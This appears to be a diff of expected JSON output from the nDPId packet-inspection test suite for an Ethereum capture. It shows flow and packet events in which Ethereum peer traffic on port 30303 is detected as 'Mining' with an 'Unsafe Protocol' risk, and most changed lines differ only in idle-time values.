+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1322,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1578508365419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365419,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGQibAqAG4neaYV91Sdl9OT1qzFZLkIoAQECxPsAAAAQEICiLYl3u827Cp"} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1323,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365239,"flow_last_seen":1578508365420,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":583,"flow_tot_l4_payload_len":583,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1578508365420,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"157.230.152.87","src_port":56658,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1339,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1578508365458,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365458,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAACwG2AY0CYBEwKgBuHZf3VXR7JfX7e3rXKASaN9TlwAAAgQFrAQCCAqDIEEYItiW\/gEDAwc="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1340,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1578508365458,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365458,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGxBbAqAG4NAmARN1Vdl\/t7etc0eyX2IAQECzabQAAAQEICiLYl5+DIEEY"} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1341,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365279,"flow_last_seen":1578508365460,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":472,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508365460,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.9.128.68","src_port":56661,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1342,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365461,"flow_last_seen":1578508365461,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365461,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1342,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1578508365461,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508365461,"pkt":"EBMx8Tl2KDc3AG3ICABFAACcQtMAAEARjkPAqAG4ynAcanZfdl8AiDkPCEixaJX\/9thQC0r9cGcsCeen+iETb10JXBU9BZQL28M1nK8vCE6bMd2SC2XGliMqSbi8oqYHUjyrBa753h2KySNTFNso18+nMzMVWvdibnHX4lluxe+\/vRPiYB2kYX3uAAHdBMuEfwAAAYJ2X4J2X8mEynAcaoJ2X4CEXhYgYQU="} 00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1342,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365461,"flow_last_seen":1578508365461,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365461,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1343,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1578508365465,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365465,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACsGNXy2oqE9wKgBuHZf3Ueh\/8nUB338R6ASOJDbwAAAAgQFrAQCCAo8EmDbItiWYAEDAwc="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1344,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1578508365465,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365465,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGIITAqAG4tqKhPd1Hdl8HffxHof\/J1YAQECwxpAAAAQEICiLYl6U8EmDb"} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1345,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365094,"flow_last_seen":1578508365466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":522,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1578508365466,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"182.162.161.61","src_port":56647,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1346,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1578508365485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365485,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC0GVVKKS6u+wKgBuHZf3VEGdfqIHq1FlaAS\/og\/VgAAAgQFrAQCCAqkAfsSItiW0AEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1347,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1578508365485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365485,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGQlrAqAG4ikurvt1Rdl8erUWVBnX6iYAQECxbjgAAAQEICiLYl7mkAfsS"} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1348,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365226,"flow_last_seen":1578508365487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":539,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1578508365487,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.75.171.190","src_port":56657,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1343,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1578508365465,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365465,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACsGNXy2oqE9wKgBuHZf3Ueh\/8nUB338R6ASOJDbwAAAAgQFrAQCCAo8EmDbItiWYAEDAwc="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1344,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1578508365465,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365465,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGIITAqAG4tqKhPd1Hdl8HffxHof\/J1YAQECwxpAAAAQEICiLYl6U8EmDb"} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1345,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365094,"flow_last_seen":1578508365466,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":522,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1578508365466,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"182.162.161.61","src_port":56647,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1346,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1578508365485,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365485,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC0GVVKKS6u+wKgBuHZf3VEGdfqIHq1FlaAS\/og\/VgAAAgQFrAQCCAqkAfsSItiW0AEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1347,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1578508365485,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365485,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGQlrAqAG4ikurvt1Rdl8erUWVBnX6iYAQECxbjgAAAQEICiLYl7mkAfsS"} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1348,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365226,"flow_last_seen":1578508365487,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":539,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1578508365487,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.75.171.190","src_port":56657,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1373,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365567,"flow_last_seen":1578508365567,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365567,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"106.12.39.168","src_port":30303,"dst_port":30333,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1373,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1578508365567,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508365567,"pkt":"EBMx8Tl2KDc3AG3ICABFAACcHIoAAEARCbPAqAG4agwnqHZfdn0AiGszdDnl2LgHwUzwnp\/NUaAjl2\/6ukAyoGtKBC9U9NcJJ2SSjY1bIBQONPG3UmfcMXvTBTN6oZMu6GXIBxr9UadDckfonN6CsHl3H7EBI7wV8mnDuf+AbUa\/i02tPDo+DL09AAHdBMuEfwAAAYJ2X4J2X8mEagwnqIJ2fYCEXhYgYQU="} 00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1373,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365567,"flow_last_seen":1578508365567,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365567,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"106.12.39.168","src_port":30303,"dst_port":30333,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1385,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365588,"flow_last_seen":1578508365588,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365588,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":56670,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1385,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1578508365588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365588,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGVs\/AqAG4p1Z6Mt1edl9ccbjwAAAAALAC\/\/8vAQAAAgQFtAEDAwUBAQgKItiYGgAAAAAEAgAA"} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1386,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365592,"flow_last_seen":1578508365592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365592,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"86.107.243.62","src_port":56671,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1386,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1578508365592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365592,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGLq7AqAG4VmvzPt1fdl9sf4vVAAAAALAC\/\/8j6AAAAgQFtAEDAwUBAQgKItiYHgAAAAAEAgAA"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1387,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1578508365593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365593,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0AABAADQGeGsj5egTwKgBuHZf3VbzHyaM6OsJA4ASbvDSjgAAAgQFjAEBBAIBAwMH"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1388,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1578508365593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1578508365593,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGbHfAqAG4I+XoE91Wdl\/o6wkD8x8mjVAQIABiKQAA"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1389,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365295,"flow_last_seen":1578508365594,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":435,"flow_tot_l4_payload_len":435,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1578508365594,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.229.232.19","src_port":56662,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1413,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1578508365619,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365619,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGH3XAqAG4BQFT4t0xdl\/cLTE7AAAAALAC\/\/\/\/rwAAAgQFtAEDAwUBAQgKItiYNwAAAAAEAgAA"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1414,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1578508365628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365628,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACcGqoHKcBxqwKgBuHZf3U9YWyaeOLFgJqAScSDw0wAAAgQFrAQCCAonH\/CcItiWswEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1415,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1578508365628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365628,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGkYnAqAG4ynAcat1Pdl84sWAmWFsmn4AQECx\/AQAAAQEICiLYmD8nH\/Cc"} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1416,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365194,"flow_last_seen":1578508365630,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":494,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1578508365630,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":56655,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1417,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1578508365631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365631,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGPLJWa\/M+wKgBuHZf3V\/moIrRbH+L1qAScSBDVwAAAgQFrAQCCApQzL4rItiYHgEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1418,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":1578508365631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365631,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGLrrAqAG4VmvzPt1fdl9sf4vW5qCK0oAQECzS7AAAAQEICiLYmEFQzL4r"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1419,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1578508365631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365631,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGY9OnVnoywKgBuHZf3V5M8kZiXHG48aAScSAfsAAAAgQFrAQCCArTe0haItiYGgEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1420,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1578508365631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365631,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGVtvAqAG4p1Z6Mt1edl9ccbjxTPJGY4AQECyvQQAAAQEICiLYmEHTe0ha"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1421,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365592,"flow_last_seen":1578508365632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1578508365632,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"86.107.243.62","src_port":56671,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1422,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365588,"flow_last_seen":1578508365633,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1578508365633,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":56670,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1463,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1578508365688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365688,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAACwGI8Z82eu0wKgBuHZf3VfxiPe9S9oGI6AScSAoCwAAAgQFrAQCCArI+HIBItiXEAEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1464,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1578508365688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365688,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGD9bAqAG4fNnrtN1Xdl9L2gYj8Yj3voAQECy2XAAAAQEICiLYmHfI+HIB"} -00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1465,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365300,"flow_last_seen":1578508365690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":545,"flow_tot_l4_payload_len":545,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1578508365690,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"124.217.235.180","src_port":56663,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 